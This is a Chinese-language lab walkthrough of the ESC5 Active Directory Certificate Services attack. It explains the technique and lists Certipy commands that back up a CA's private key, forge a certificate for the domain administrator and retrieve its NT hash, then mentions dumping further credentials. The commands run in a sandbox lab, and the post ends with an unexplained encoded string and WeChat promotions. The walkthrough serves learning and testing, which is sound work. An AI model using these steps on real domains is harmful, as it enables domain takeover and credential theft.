摘要
继我之前写的ESC4文章之后——现在我的工作完成了,终于有更多时间学习,我想我也要深入研究一下ESC5。说实话,我不知道为什么,但学习活动目录(Active Directory)利用感觉起来更令人兴奋,尽管在印度尼西亚的真实环境中仍然相当罕见。可能只是我理想主义的一面吧,哈哈哈。好了,让我们开始一起学习吧。
什么是ESC5
ESC5是一种针对活动目录证书服务(ADCS)的攻击。这种攻击利用了对证书颁发机构(CA)的访问权限。如果攻击者获得了CA服务器上的本地管理员权限,就可以提取CA证书及其私钥。利用该私钥,攻击者可以为特权账户(如域管理员)伪造恶意证书。然后,这些伪造的证书可用于通过PKINIT向AD进行身份验证并请求TGT(票据授予票据)。
搭建实验室
创建一个任意名称的账户,并将该账户添加为CA服务器(DC01)上的本地管理员:
net localgroup Administrators "igniteraj" /add
net localgroup Administrators
(按回车或点击查看完整大小的图片)
枚举与利用
使用Certipy在CA服务器上以本地管理员账户枚举证书。
(按回车或点击查看完整大小的图片)
(按回车或点击查看完整大小的图片)
使用Certipy备份CA证书和私钥。
certipy ca -backup -u alex.doe@sandbox.local -p "MyPassword123" -ca ignite-DC-CA -target 10.100.150.10
伪造我们想要接管的账户——在本例中是administrator@sandbox.local,因为它是我的目标上的域管理员。
certipy forge -ca-pfx 'sandbox-ca.pfx' -upn administrator@sandbox.local
使用Certipy获取administrator@sandbox.local账户的NT哈希。
certipy auth -pfx administrator_forged.pfx -dc-ip 10.100.150.10
(按回车或点击查看完整大小的图片)
(按回车或点击查看完整大小的图片)
使用SecretDump导出哈希凭据。
(按回车或点击查看完整大小的图片)
参考资料
- https://www.hackingarticles.in/ad-cs-esc5-vulnerable-pki-object-access-control/
- https://mayfly277.github.io/posts/ADCS-part14/
- https://www.vaadata.com/blog/ad-cs-security-understanding-and-exploiting-esc-techniques/
CSD0tFqvECLokhw9aBeRqixLzx0482UkkKWM4rJX2T+9qXDLcUYQal3W1ykfQ9si0pulG6s9/0h/hW8d28k1SsX8sObhJabP00Qx1uju62JSdqgDv8XWiIQ1stSnFOlB/q2Fi82D6F6LlOrFptzcOg==
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
公众号二维码
公众号二维码
